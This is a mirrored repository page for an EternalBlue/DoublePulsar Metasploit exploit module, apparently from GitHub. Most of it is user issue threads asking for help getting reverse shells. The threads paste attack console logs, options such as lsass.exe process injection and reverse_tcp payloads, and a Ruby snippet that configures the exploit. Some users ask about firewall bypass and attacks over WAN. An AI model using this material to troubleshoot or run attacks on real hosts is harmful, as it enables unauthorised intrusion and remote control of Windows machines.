Code Monkey home page Code Monkey logo

eternalblue-doublepulsar-metasploit's Introduction

Eternalblue-Doublepulsar-Metasploit

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

eternalblue-doublepulsar-metasploit's People

Contributors

ideaslocas avatar jaesga avatar pablogonzalezperez avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

eternalblue-doublepulsar-metasploit's Issues

backdoor is already installed..

[*] Started reverse TCP handler on 192.168.1.3:4444 
[*] IP_ADDRESS:445 - Generating Eternalblue XML data
[*] IP_ADDRESS:445 - Generating Doublepulsar XML data
[*] IP_ADDRESS:445 - Generating payload DLL for Doublepulsar
[*] IP_ADDRESS:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] IP_ADDRESS:445 - Launching Eternalblue...
[+] IP_ADDRESS:445 - Backdoor is already installed
[*] IP_ADDRESS:445 - Launching Doublepulsar...
Error sending wrong architecture DLL to target
[+] IP_ADDRESS:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.

Now what to do? :(

Deps

Where do I put the deps directory ?? Remembering that I am using kali

hi i try this in metasploit pro on windows 10 pro 64 bit and i get this

Communication Error

Problem Description

The Pro Service returned a server-side error. This may be caused by a badly behaving target system or session.The specific error was Msf::RPC::Exception Invalid Module (["lib/msf/core/rpc/v10/rpc_base.rb:25:in error'", "lib/msf/core/rpc/v10/rpc_module.rb:408:in _find_module'", "lib/msf/core/rpc/v10/rpc_module.rb:221:in rpc_options'", "lib/msf/core/rpc/v10/service.rb:152:in block in process'", "lib/ruby/2.3.0/timeout.rb:91:in block in timeout'", "lib/ruby/2.3.0/timeout.rb:33:in block in catch'", "lib/ruby/2.3.0/timeout.rb:33:in catch'", "lib/ruby/2.3.0/timeout.rb:33:in catch'", "lib/ruby/2.3.0/timeout.rb:106:in timeout'", "lib/msf/core/rpc/v10/service.rb:152:in process'", "lib/msf/core/rpc/v10/service.rb:90:in on_request_uri'", "lib/msf/core/rpc/v10/service.rb:72:in block in start'", "lib/rex/proto/http/handler/proc.rb:38:in on_request'", "lib/rex/proto/http/server.rb:368:in dispatch_request'", "lib/rex/proto/http/server.rb:302:in on_client_data'", "lib/rex/proto/http/server.rb:161:in block in start'", "lib/rex/io/stream_server.rb:48:in on_client_data'", "lib/rex/io/stream_server.rb:192:in block in monitor_clients'", "lib/rex/io/stream_server.rb:190:in each'", "lib/rex/io/stream_server.rb:190:in monitor_clients'", "lib/rex/io/stream_server.rb:73:in block in start'", "lib/rex/thread_factory.rb:22:in block in spawn'", "lib/msf/core/thread_manager.rb:100:in `block in spawn'"])

Problem Solution

This problem may resolve itself on its own. If this continues to appear, try restarting the Metasploit services or contacting customer support.

Can't return shell

In vps,it's intranet address and mapping internet address like aws or gce.when set payload can't return the shell.Can have an option set the dll ?

exploit other system?

How can i use this module to exploit other systems like win8 win8.1 and win10,?I don't find these target at options.

Error getting output back from Core; aborting...

Hi,
I have this issue when I tried on a Windows Server 2008 x86.
Error getting output back from Core; aborting...
Started reverse TCP handler on 192.168.111.128:4444
[] 192.168.111.129:445 - Generating Eternalblue XML data
[
] 192.168.111.129:445 - Generating Doublepulsar XML data
[] 192.168.111.129:445 - Generating payload DLL for Doublepulsar
[
] 192.168.111.129:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[] 192.168.111.129:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.111.129:445 - Are you sure it's vulnerable?
[
] 192.168.111.129:445 - Launching Doublepulsar...
[-] 192.168.111.129:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.

I set the target to windows server 2008 (x86)
and set processinject for default, wlms.exe

eternalblue

[] Started reverse TCP handler on 192.168.1.116:4444
[
] 173.201.36.54:445 - Generating Eternalblue XML data
cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.Skeleton.xml': No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
[] 173.201.36.54:445 - Generating Doublepulsar XML data
cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.Skeleton.xml': No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
[
] 173.201.36.54:445 - Generating payload DLL for Doublepulsar
[-] 173.201.36.54:445 - Exploit failed: Errno::EACCES Permission denied @ rb_sysopen - /root/.wine/drive_c/eternal11.dll
[*] Exploit completed, but no session was created.
i receive this error when i run eternalblue exploit

Pc reboot after meterpreter session/Redémarrge PC après session meterpreter

Bonjour, après avoir lancé le module sur l'ordinateur de la victime, je reçois une session meterpreter, mais quelques secondes/minutes après l'ordinateur redémarre.
Si quelqu'un sait quoi faire qu'il se montre ! ;-)
Merci d'avance ! (victime : architecture x64, processus à injecter : lsass.exe)

Hello, I'm french but if somebody wants I can speak in english. After have sent the module on the victim's computer, I get meterpreter session, but few seconds/minutes after the computer reboot.
If someone know what I can do, show yourself ! ;-)
Thank you in advance ! (victim : architecture x64, process inject : lsass.exe)

Error sending wrong architecture DLL to target

Hi,
I keep getting this error trying to execute the attack:

msf exploit(eternalblue_doublepulsar) > exploit

[] Started reverse TCP handler on 192.168.1.100:4444
[
] 192.168.1.72:445 - Generating Eternalblue XML data
[] 192.168.1.72:445 - Generating Doublepulsar XML data
[
] 192.168.1.72:445 - Generating payload DLL for Doublepulsar
[] 192.168.1.72:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[
] 192.168.1.72:445 - Launching Eternalblue...
[+] 192.168.1.72:445 - Backdoor is already installed
[] 192.168.1.72:445 - Launching Doublepulsar...
Error sending wrong architecture DLL to target
[+] 192.168.1.72:445 - Remote code executed... 3... 2... 1...
[
] Exploit completed, but no session was created.

Changed the PROCESSINJECT to lsass.exe and TARGETARCHITECTURE x64

Thank you,

help bypass

i want bypass exploit becuse firewall block connection if i close it exploit sucss if i open it exploit faild in windows 7 and kali 2017

WARNING! The following modules could not be loaded!

When I copied these modules to /usr/share/metasploit-framework/modules/exploits/windows/smb, and then opened Metasploit, I got this error

[-] WARNING! The following modules could not be loaded!
[-] /usr/share/metasploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb: Msf::Modules::MetasploitClassCompatibilityError Failed to load module (windows/smb/eternalblue_doublepulsar from /usr/share/metasploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb) due to Missing compatible Metasploit<major_version> class constant

This is my metasploit version: metasploit v4.11.4-2015071402

Failed to load module

  • Launching Eternalblue...
    [-] Error getting output back from Core; aborting...
  • Are you sure it's vulnerable?
  • Launching Doublepulsar...
  • Oops, something was wrong!
    [*] Exploit completed, but no session was created.

wine: /home/$/.wine is not owned by you

..*445 - Generating Eternalblue XML data
..*445 - Generating Doublepulsar XML data
..*445 - Generating payload DLL for Doublepulsar
..*445 - Writing DLL in /home/ghost/.wine/drive_c/eternal11.dll
..*445 - Launching Eternalblue...
..*445 - Are you sure it's vulnerable?
..*445 - Launching Doublepulsar...
..*445 - Oops, something was wrong!

'sed' is not recognized as an internal or external command

I use metasploit in windows and after i run exploit command these errors shows

[*] Started reverse TCP handler on 192.168.1.222:4444
[*] 192.168.1.140:445 - Generating Eternalblue XML data
C:/metasploit/apps/pro/engine/msfpro: No such file or directory - cp /root/Deskt
op/ eternalblue_doublepulsar-metasploit/deps/Eternalblue-2.2.0.Skeleton.xml /roo
t/Desktop/ eternalblue_doublepulsar-metasploit/deps/Eternalblue-2.2.0.xml
'sed' is not recognized as an internal or external command,
operable program or batch file.
'sed' is not recognized as an internal or external command,
operable program or batch file.
'sed' is not recognized as an internal or external command,
operable program or batch file.
'sed' is not recognized as an internal or external command,
operable program or batch file.
[*] 192.168.1.140:445 - Generating Doublepulsar XML data
C:/metasploit/apps/pro/engine/msfpro: No such file or directory - cp /root/Etern
alblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.Skeleton.xml /root/Etern
alblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml
'sed' is not recognized as an internal or external command,
operable program or batch file.
'sed' is not recognized as an internal or external command,
operable program or batch file.
'sed' is not recognized as an internal or external command,
operable program or batch file.
'sed' is not recognized as an internal or external command,
operable program or batch file.
'sed' is not recognized as an internal or external command,
operable program or batch file.
'sed' is not recognized as an internal or external command,
operable program or batch file.
[*] 192.168.1.140:445 - Generating payload DLL for Doublepulsar
[-] 192.168.1.140:445 - Exploit failed: Errno::ENOENT No such file or directory
@ rb_sysopen - /root/.wine/drive_c/eternal11.dll
[*] Exploit completed, but no session was created.

I think because it is written for linux and it must been changed this part to run on windows


#Custom XML Eternalblue
 print_status('Generating Eternalblue XML data')
 cp = `cp #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.Skeleton.xml #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
 sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
 sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
 sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`

 #WIN72K8R2 (4-8) and XP (0-3)
 if target.name =~ /7|2008|Vista/
   objective = "WIN72K8R2"
 else
   objective = "XP"
 end

 sed = `sed -i 's/%TARGET%/#{objective}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`

 #Custom XML Doublepulsar
 print_status('Generating Doublepulsar XML data')
 cp = `cp #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.Skeleton.xml #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
 sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
 sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
 sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
 sed = `sed -i 's/%TARGETARCHITECTURE%/#{datastore['TARGETARCHITECTURE']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
 dllpayload = datastore['WINEPATH'] + datastore['DLLName']
 dllpayload2 = dllpayload.gsub('/','\/')
 sed = `sed -i 's/%DLLPAY%/#{dllpayload2}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
 sed = `sed -i 's/%PROCESSINJECT%/#{datastore['PROCESSINJECT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`


Am i right?

And how do i have to change the code?

thanks.

Can't run the exploit successfully

Everytime I try to launch exploit it says something like ' error getting ( something ) back from the core , aborting ..

Plz help me

PS : the IP is Vulnerable to attack

Cannot load module

use exploit/windows/smb/ms17_010_eternalblue
[-] Failed to load module: exploit/windows/smb/ms17_010_eternalblue
msf > use windows/smb/ms17_010_eternalblue
[-] Failed to load module: windows/smb/ms17_010_eternalblue
msf > use windows/smb/ms17_010_eternalblue
[-] Failed to load module: windows/smb/ms17_010_eternalblue
msf > use windows/smb/ms17_010_eternalblue
[-] Failed to load module: windows/smb/ms17_010_eternalblue
msf > info windows/smb/ms17_010_eternalblue
[-] Invalid module: windows/smb/ms17_010_eternalblue
msf >

HELP-ME

msf exploit(eternalblue_doublepulsar) > run

[] Started reverse TCP handler on xxxxxxxxxxxxxxxx:4444
[
] xxxxxxxxxxxxxxxx:445 - Generating Eternalblue XML data
[] xxxxxxxxxxxxxxxx:445 - Generating Doublepulsar XML data
[
] xxxxxxxxxxxxxxxx:445 - Generating payload DLL for Doublepulsar
[] xxxxxxxxxxxxxxxx:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[
] xxxxxxxxxxxxxxxx:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] xxxxxxxxxxxxxxxx:445 - Are you sure it's vulnerable?
[] xxxxxxxxxxxxxxxx:445 - Launching Doublepulsar...
[-] xxxxxxxxxxxxxxxx:445 - Oops, something was wrong!
[
] Exploit completed, but no session was created.

I've rounded the scanner and returned that it is vulnerable,
What would this error be?

Custom DLL

Is it possible to use a pre-generated custom DLL ???
if yes please explain to me how to do that with metasploit
thanks .

Not working on the windows version of metasploit

the script is written only for the linux version of metasploit , using wine for lunching the binaries , how about exploiting a windows machine from another windows machine ? did anyone try porting the script to the windows version of metasploit ?

Error getting output back from Core; aborting

I access the remote intranet machine via post/windows/manage/autoroute。

192.168.244.0 255.255.255.0 Session 7

Then I want to attack a remote host with eternalblue_doublepulsar , but failed.

[] 192.168.244.134:445 - Generating Doublepulsar XML data
[
] 192.168.244.134:445 - Generating payload DLL for Doublepulsar
[] 192.168.244.134:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[
] 192.168.244.134:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.244.134:445 - Are you sure it's vulnerable?

But as a matter of fact, 192.168.244.134 is Vulnerable.
Should my machine have to be in the intranet 192.168.244.0/24,too?
Asking for help, thank you

HELP-ME

How do I find the eternal11.dll file

[] Exploit completed, but no session was created.

] Started reverse TCP handler on 192.168.195.129:4444
[
] 192.168.1.150:445 - Generating Eternalblue XML data
[] 192.168.1.150:445 - Generating Doublepulsar XML data
[
] 192.168.1.150:445 - Generating payload DLL for Doublepulsar
[] 192.168.1.150:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[
] 192.168.1.150:445 - Launching Eternalblue...
[+] 192.168.1.150:445 - Pwned! Eternalblue success!
[] 192.168.1.150:445 - Launching Doublepulsar...
[+] 192.168.1.150:445 - Remote code executed... 3... 2... 1...
[
] Exploit completed, but no session was created.

how to get a session if the Backdoor is already installed

[] Started reverse TCP handler on 192.168.1.5:4444
[
] 192.168.1.8:445 - Generating Eternalblue XML data
[] 192.168.1.8:445 - Generating Doublepulsar XML data
[
] 192.168.1.8:445 - Generating payload DLL for Doublepulsar
[] 192.168.1.8:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[
] 192.168.1.8:445 - Launching Eternalblue...
[+] 192.168.1.8:445 - Backdoor is already installed
[] 192.168.1.8:445 - Launching Doublepulsar...
Error sending wrong architecture DLL to target
[+] 192.168.1.8:445 - Remote code executed... 3... 2... 1...
[
] Exploit completed, but no session was created.

Wine error: "Not supported on this installation (x86 binary)

Hey guys! Im trying to get this exploit to work in metasploit in Kali Linux on Android (via Linux Deploy) and I cant stop getting this error; I have searched for it's solution in almost the whole internet and I couldnt find it, so Im going to report the issue here (I hope you can help me). This is what Im getting:
https://user-images.githubusercontent.com/12059254/28150796-325634f8-676d-11e7-8f47-d30c7858dc21.png

I know that it already exists an exploit completely integrated with metasploit and I have already tested it, and I noticed that it only works with x64 systems, not like ElevenPaths's exploit, which I have tested and noticed that works in both architectures.

What I have already tried (or at least I remember I have):
*Installing wine32 and winetricks (apt-get install wine32/winetricks)
*apt-get update
*dpkg --add-architecture i386

Please help me! I swear Im getting crazy with this error!

Can't run the exploit successfully

Everytime I try to launch exploit it says something like ' error getting ( something ) back from the core , aborting ..

Plz help me

PS : the IP is Vulnerable to attack

Kali armitage can't create session for win7.

i've use Eternalblue-Doublepulsar to exploit windows XP and armitage(in Kali) works good, but it doesn't work for windows 7 x64. The metasploit also can works good,but the
armitage send me this error:
msf〉.....
......
[] 192.168.1.150:445 - Launching Eternalblue...
[+] 192.168.1.150:445 - Pwned! Eternalblue success!
[] 192.168.1.150:445 - Launching Doublepulsar...
[+] 192.168.1.150:445 - Remote code executed... 3... 2... 1...
[] Exploit completed, but no session was created.

of course, I set the following options.
set payload windows/x64/meterpreter/reverse_tcp

Not working on Nethunter

I am running Nethunter on OnePlus One (bacon) with android Nougat and wine already installed
am getting this result :

[] Started reverse TCP handler on 192.168.1.21:4444
[
] 192.168.1.23:445 - Generating Eternalblue XML data
[] 192.168.1.23:445 - Generating Doublepulsar XML data
[
] 192.168.1.23:445 - Generating payload DLL for Doublepulsar
[] 192.168.1.23:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[
] 192.168.1.23:445 - Launching Eternalblue...
err:process:start_wineboot failed to start wineboot, err 1359
err:process:create_process L"Z:\usr\share\metasploit-framework\deps\Eternalblue-2.2.0.exe" not supported on this installation (x86 binary)
wine: Bad EXE format for Z:\usr\share\metasploit-framework\deps\Eternalblue-2.2.0.exe.
[-] 192.168.1.23:445 - Are you sure it's vulnerable?
[] 192.168.1.23:445 - Launching Doublepulsar...
err:process:start_wineboot failed to start wineboot, err 1359
err:process:create_process L"Z:\usr\share\metasploit-framework\deps\Doublepulsar-1.3.1.exe" not supported on this installation (x86 binary)
wine: Bad EXE format for Z:\usr\share\metasploit-framework\deps\Doublepulsar-1.3.1.exe.
[-] 192.168.1.23:445 - Oops, something was wrong!
[
] Exploit completed, but no session was created.

Can i assume after this that the PoC can not be executed under ARM architecture ?? are there any workarounds for this ?

payload error

Exploit failed: Msf::NoCompatiblePayloadError A platform could not be determined by the generic payload

tried arch x86 and x64 same error please advise

No x86 option

I can't manage to exploit x86 OS

My only option is ; 0 Windows 7 and Server 2008 R2 (x64) All Service Packs

Thx for any help

Can't run the exploit successfully

Everytime I try to launch exploit it says something like ' error getting ( something ) back from the core , aborting ..

Plz help me

PS : the IP is Vulnerable to attack

Attack success does not return shell

Hello the developer:
How should i solve it?
**
[] Started reverse TCP handler on 192.168.12.110:8888
[
] 192.168.12.106:445 - Generating Eternalblue XML data
[] 192.168.12.106:445 - Generating Doublepulsar XML data
[
] 192.168.12.106:445 - Generating payload DLL for Doublepulsar
[] 192.168.12.106:445 - Writing DLL in /root/8888.dll
[
] 192.168.12.106:445 - Launching Eternalblue...
[+] 192.168.12.106:445 - Backdoor is already installed
[] 192.168.12.106:445 - Launching Doublepulsar...
[+] 192.168.12.106:445 - Remote code executed... 3... 2... 1...
[
] Exploit completed, but no session was created.
**

exploit Eternalblue for windows 2003 sp2 32bit

Hi,
i've use Eternalblue-Doublepulsar to exploit windows server 2008 R2 x64 and it works good, but it doesn't work for windows 2003 sp2 32bits the metasploit send me this error ::
msf exploit(eternalblue_doublepulsar) > exploit

[] Target IP:445 - Generating Eternalblue XML data
[
] Started bind handler
[] Target IP:445 - Generating Doublepulsar XML data
[
] Target IP:445 - Generating payload DLL for Doublepulsar
[] Target IP:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[
] Target IP:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] Target IP:445 - Are you sure it's vulnerable?
[] Target IP:445 - Launching Doublepulsar...
[-] Target IP:445 - Oops, something was wrong!
[
] Exploit completed, but no session was created.

What can be the probleme, i've configure the real parameters for the exploit : system architecture ... ?? please help me
and i've checked the target machine vulnerability with the auxiliary(smb_ms17_010) and it return that the host is vulnerable

LoadError cannot load such file -- ruby_smb

I get this error when i load msfconsole:
[-] WARNING! The following modules could not be loaded!
[-] /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb: LoadError cannot load such file -- ruby_smb

Btw i have installed ruby_smb

Eternalblue on wan

Hello ! I have one question : is it possible to run the script eternalblue doublepulsar on wan ? If yes how is it possible ? Thanks in advance !

Add empire/custom DLL

Evening :)
Besides using the metasploit DLL's is it possible to in example import an Empire generated dll ?
image

Bad EXE format

[] Started reverse TCP handler on 192.168.1.150:4444
[
] 192.168.1.31:445 - Generating Eternalblue XML data
[] 192.168.1.31:445 - Generating Doublepulsar XML data
[
] 192.168.1.31:445 - Generating payload DLL for Doublepulsar
[] 192.168.1.31:445 - Writing DLL in /root/.wine64/drive_c/eternal11.dll
[
] 192.168.1.31:445 - Launching Eternalblue...
wine: Bad EXE format for Z:\opt\metasploit-framework\modules\exploits\windows\smb\Eternalblue-Doublepulsar-Metasploit\deps\Eternalblue-2.2.0.exe.
[-] 192.168.1.31:445 - Are you sure it's vulnerable?
[] 192.168.1.31:445 - Launching Doublepulsar...
Application tried to create a window, but no driver could be loaded.
Make sure that your X server is running and that $DISPLAY is set correctly.
wine: Bad EXE format for Z:\opt\metasploit-framework\modules\exploits\windows\smb\Eternalblue-Doublepulsar-Metasploit\deps\Doublepulsar-1.3.1.exe.
[-] 192.168.1.31:445 - Oops, something was wrong!
[
] Exploit completed, but no session was created.

wrong elff class

I am running kali 2.0 and targeting a windows 8 VM. I have added i386 architecture, as well as wine32.

when i run this module in metasploit i get the following output/error:

`msf exploit(eternalblue_doublepulsar) > run

[] Started reverse TCP handler on 10.0.0.10:4444
[
] 10.0.0.20:445 - Generating Eternalblue XML data
[] 10.0.0.20:445 - Generating Doublepulsar XML data
[
] 10.0.0.20:445 - Generating payload DLL for Doublepulsar
[] 10.0.0.20:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[
] 10.0.0.20:445 - Launching Eternalblue...
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
[-] Error getting output back from Core; aborting...
[-] 10.0.0.20:445 - Are you sure it's vulnerable?
[] 10.0.0.20:445 - Launching Doublepulsar...
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
ERROR: ld.so: object '/lib/snoopy.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
[-] 10.0.0.20:445 - Oops, something was wrong!
[
] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >
`

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.